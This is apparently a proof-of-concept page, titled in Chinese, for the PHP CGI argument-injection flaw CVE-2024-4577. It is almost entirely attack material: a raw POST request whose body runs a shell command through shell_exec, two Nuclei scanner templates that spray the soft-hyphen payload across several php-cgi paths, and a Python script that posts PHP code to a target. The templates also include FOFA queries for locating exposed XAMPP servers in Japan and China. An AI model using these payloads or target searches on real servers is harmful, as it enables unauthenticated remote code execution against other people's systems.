PHP CGI 参数注入 （CVE-2024-4577） 远程代码执行 PoC

POST /index.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: Content-Type: application/x-www-form-urlencoded<?php echo shell_exec("dir"); ?>

id: CVE-2024-4577info:  name: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution  author: Ayu  description: Allowing unauthenticated attackers to execute arbitrary code on remote XAMPP servers through specific character sequences(0xAD)  reference:    - https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/  severity: critical  tags: cve, rce, php  metadata:    fofa-query:      - 'app="XAMPP"'      - 'app="XAMPP" && country=JP'      - 'app="XAMPP" && country=CN'variables:  payload: "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"http:  - raw:    - |      POST /unfxu9a.php{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/121.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>     - |      POST /php-cgi/unfxu9a.php{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/121.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>     - |      POST /cgi-bin/php-cgi.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>     - |      POST /php-cgi/php-cgi.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/123.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>    - |      POST /php-cgi/php.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/123.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>    - |      POST /cgi-bin/php.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/123.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "PHP Version")'        condition: and

id: CVE-2024-4577info:  name: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution  author: Ayu  description: Allowing unauthenticated attackers to execute arbitrary code on remote XAMPP servers through specific character sequences(0xAD)  reference:    - https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/  severity: critical  tags: cve, rce, php  metadata:    fofa-query:      - 'app="XAMPP"'      - 'app="XAMPP" && country=JP'      - 'app="XAMPP" && country=CN'variables:  payload: "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"http:  - method: POST    path:      - "{{BaseURL}}/index.php{{payload}}"      - "{{BaseURL}}/unfxu9a.php{{payload}}"      - "{{BaseURL}}/php-cgi/unfxu9a.php{{payload}}"      - "{{BaseURL}}/cgi-bin/php-cgi.exe{{payload}}"      - "{{BaseURL}}/php-cgi/php-cgi.exe{{payload}}"      - "{{BaseURL}}/php-cgi/php.exe{{payload}}"      - "{{BaseURL}}/cgi-bin/php.exe{{payload}}"    headers:      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0"      Accept: "*/*"      Content-Type: "application/x-www-form-urlencoded"      Connection: "keep-alive"    body: "<?php phpinfo(); ?>"    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "PHP Version")'        condition: and

import requestsimport argparsedef test_cgi_vulnerability(url):    payloads = [        '/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input',        '/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'    ]    php_code = '<?php echo "vulnerable"; ?>'    headers = {        "Content-Type": "application/x-www-form-urlencoded"    }    for payload in payloads:        test_url = f"{url}{payload}"        try:            response = requests.post(test_url, headers=headers, data=php_code)            response_text = response.text.lower()            if "vulnerable" in response_text or "directory" in response_text or "index of" in response_text:                print(f"(+) Potential vulnerability detected at: {test_url}")            else:                print(f"(-) No vulnerability detected at: {test_url}")        except Exception as e:            print(f"(!) Error testing {test_url}: {e}")def main():    parser = argparse.ArgumentParser(description="PHP CGI Argument Injection (CVE-2024-4577) Detection Script")    parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)    args = parser.parse_args()    target_url = args.target.rstrip('/')    test_cgi_vulnerability(target_url)if __name__ == "__main__":    main()